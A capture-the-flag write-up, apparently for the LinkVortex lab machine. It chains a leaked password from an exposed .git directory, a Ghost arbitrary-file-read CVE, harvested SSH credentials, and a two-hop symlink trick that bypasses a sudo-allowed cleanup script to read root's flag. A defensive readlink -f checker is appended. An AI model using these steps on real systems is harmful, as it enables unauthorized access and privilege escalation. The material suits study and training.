fscan turned up little of interest; directory scanning found:

http://linkvortex.htb/robots.txt

```
User-agent: *
Sitemap: http://linkvortex.htb/sitemap.xml
Disallow: /ghost/
Disallow: /p/
Disallow: /email/
Disallow: /r/
```

A login form, but nothing to do with it for now.


Fuzzing turned up a [Launching Soon](http://dev.linkvortex.htb/) page.


Exposed .git directory


GitHack and GitHacker pull down somewhat different results.

Some sensitive information can be recovered from it:

```js
const email = 'test@example.com';
const password = 'OctopiFociPilfer45';
```

Learned a new trick here:

/.git/logs/HEAD is worth checking; it records information about whoever made the commits.

```
0000000000000000000000000000000000000000 299cdb4387763f850887275a716153e84793077d root <dev@linkvortex.htb> 1730322603 +0000	clone: from https://github.com/TryGhost/Ghost.git
```

Changing dev to admin gives a working login:

```
admin@linkvortex.htb
OctopiFociPilfer45
```

The version turns out to be 5.58.0.

0xDTC/Ghost-5.58-Arbitrary-File-Read-CVE-2023-40028: CVE-2023-40028 affects Ghost, an open source content management system, where versions prior to 5.59.1 allow authenticated users to upload files that are symlinks. This can be exploited to perform an arbitrary file read of any file on the host operating system.


Grab credentials for another account:

```json
"user": "bob@linkvortex.htb",
"pass": "fibber-talented-worth"
```

SSH in and grab user.txt.


`sudo -l` shows `(ALL) NOPASSWD: /usr/bin/bash /opt/ghost/clean_symlink.sh *.png`


clean_symlink.sh:

```bash
#!/bin/bash

QUAR_DIR="/var/quarantined"

if [ -z $CHECK_CONTENT ];then
  CHECK_CONTENT=false
fi

LINK=$1

if ! [[ "$LINK" =~ \.png$ ]]; then
  /usr/bin/echo "! First argument must be a png file !"
  exit 2
fi

if /usr/bin/sudo /usr/bin/test -L $LINK;then
  LINK_NAME=$(/usr/bin/basename $LINK)
  LINK_TARGET=$(/usr/bin/readlink $LINK)
  if /usr/bin/echo "$LINK_TARGET" | /usr/bin/grep -Eq '(etc|root)';then
    /usr/bin/echo "! Trying to read critical files, removing link [ $LINK ] !"
    /usr/bin/unlink $LINK
  else
    /usr/bin/echo "Link found [ $LINK ] , moving it to quarantine"
    /usr/bin/mv $LINK $QUAR_DIR/
    if $CHECK_CONTENT;then
      /usr/bin/echo "Content:"
      /usr/bin/cat $QUAR_DIR/$LINK_NAME 2>/dev/null
    fi
  fi
fi
```

Classic symlink abuse: `readlink` only resolves one hop, so a link that points at another link never contains `etc` or `root` and passes the filter.

```console
bob@linkvortex:~$ ln -s /root/root.txt 1.txt
bob@linkvortex:~$ ln -s /home/bob/1.txt 1.png
bob@linkvortex:~$ sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh /home/bob/1.png
Link found [ /home/bob/1.png ] , moving it to quarantine
Content:
xxxxxxxxxxxxxxxxxxx
bob@linkvortex:~$
```
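The one-hop `readlink` is the root cause. As an added example that is not from the writeup or the box, here is a checker that canonicalises the whole chain with `readlink -f` before applying the /etc and /root filter, so the two-hop trick above is rejected; the function names are mine and the demo builds its own links in a scratch directory.

```shell
# Added example, not part of the writeup or the box's clean_symlink.sh.
# Function names (check_png_link, demo_chain, demo_benign) are my own.

# Exit status: 0 = allowed (prints the canonical target), 1 = rejected,
# 2 = bad argument. Keeps the original's .png and "must be a symlink" rules.
check_png_link() {
    link="$1"
    case "$link" in
        *.png) ;;
        *) echo "! First argument must be a png file !" >&2; return 2 ;;
    esac
    [ -L "$link" ] || { echo "not a symlink: $link" >&2; return 2; }
    # readlink -f follows every hop; plain readlink (as in clean_symlink.sh)
    # reports only the first one, so png -> txt -> /root/root.txt slips by.
    target=$(readlink -f "$link") || return 2
    case "$target" in
        /etc|/etc/*|/root|/root/*)
            echo "! Trying to read critical files [ $target ] !" >&2
            return 1 ;;
    esac
    echo "$target"
}

# Constructed reproduction of the chain from the session above, pointed at
# /etc/passwd so the final target exists on any Linux host.
# Returns the checker's exit status (1 = rejected).
demo_chain() {
    d=$(mktemp -d)
    ln -s /etc/passwd "$d/1.txt"     # hop 2: the real target
    ln -s "$d/1.txt" "$d/1.png"      # hop 1: what the script is handed
    echo "one-hop readlink sees only: $(readlink "$d/1.png")"
    rc=0
    check_png_link "$d/1.png" || rc=$?
    rm -rf "$d"
    return "$rc"
}

# A link that resolves somewhere harmless is still allowed (prints its target).
demo_benign() {
    d=$(mktemp -d)
    ln -s /tmp/harmless.txt "$d/ok.png"
    rc=0
    check_png_link "$d/ok.png" || rc=$?
    rm -rf "$d"
    return "$rc"
}
```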
